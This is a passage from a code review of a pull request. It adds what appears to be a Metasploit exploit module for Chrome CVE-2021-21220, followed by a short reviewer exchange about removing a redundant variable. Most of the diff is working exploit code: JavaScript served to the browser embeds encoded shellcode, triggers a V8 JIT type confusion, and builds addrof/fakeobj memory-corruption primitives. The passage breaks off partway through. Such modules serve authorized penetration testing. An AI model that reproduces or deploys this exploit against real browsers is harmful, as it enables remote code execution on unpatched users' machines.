modules/exploits/multi/browser/chrome_cve_2021_21220_v8_insufficient_validation.rb

```diff
@@ -0,0 +1,179 @@
+          ['URL', 'https://www.zerodayinitiative.com/advisories/ZDI-21-411/']
+        ],
+        'Arch' => [ ARCH_X64 ],
+        'DefaultTarget' => 0,
+        'Payload' =>
+        {
+          'Space' => 4096
+        },
+        'Notes' =>
+        {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'SideEffects' => [ IOC_IN_LOGS ]
+        },
+        'Targets' =>
+          [
+            ['Linux - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'linux' }],
+            ['Windows 10 - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'win' }],
+            ['macOS - Google Chrome < 89.0.4389.128/90.0.4430.72 (64 bit)', { 'Platform' => 'osx' }],
+          ],
+        'DisclosureDate' => '2021-04-13'
+      )
+    )
+  end
+
+  def on_request_uri(cli, request)
+    print_status("Sending #{request.uri} to #{request['User-Agent']}")
+    shellcode = Rex::Text.to_num(payload.encoded).gsub(/\r\n/, '')
+    jscript = <<~JS
+      var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
+      var wasm_mod = new WebAssembly.Module(wasm_code);
+      var wasm_instance = new WebAssembly.Instance(wasm_mod);
+      var f = wasm_instance.exports.main;
+
+      var buf = new ArrayBuffer(8);
+      var f64_buf = new Float64Array(buf);
+      var u64_buf = new Uint32Array(buf);
+
+      var shellcode = new Uint8Array([#{shellcode}]);
+      var shellbuf = new ArrayBuffer(shellcode.length);
+      var dataview = new DataView(shellbuf);
+
+      function ftoi(val) {
+          f64_buf[0] = val;
+          return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
+      }
+
+      function itof(val) {
+          u64_buf[0] = Number(val & 0xffffffffn);
+          u64_buf[1] = Number(val >> 32n);
+          return f64_buf[0];
+      }
+
+      const _arr = new Uint32Array([2**31]);
+
+      function foo(a) {
+          var x = 1;
+        x = (_arr[0] ^ 0) + 1;
+
+        x = Math.abs(x);
+        x -= 2147483647;
+        x = Math.max(x, 0);
+
+        x -= 1;
+        if(x==-1) x = 0;
+
+        var arr = new Array(x);
+        arr.shift();
+        var cor = [1.1, 1.2, 1.3];
+
+        return [arr, cor];
+      }
+
+      for(var i=0;i<0x3000;++i)
+          foo(true);
+
+      var x = foo(false);
+      var arr = x[0];
+      var cor = x[1];
+
+      const idx = 6;
+      arr[idx+10] = 0x4242;
+
+      function addrof(k) {
+          arr[idx+1] = k;
+          return ftoi(cor[0]) & 0xffffffffn;
+      }
+
+      function fakeobj(k) {
+          cor[0] = itof(k);
+          return arr[idx+1];
+      }
+
+      var float_array_map = ftoi(cor[3]);
+
+      var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
```

Comment:
Pedantic, but surely `itof(ftoi(cor[3]))` is just `cor[3]`, perhaps `float_array_map` can be removed?

Reply:
Yep your theory was correct. Replaced this with just `cor[3]` and removed the `float_array_map` variable and this works fine.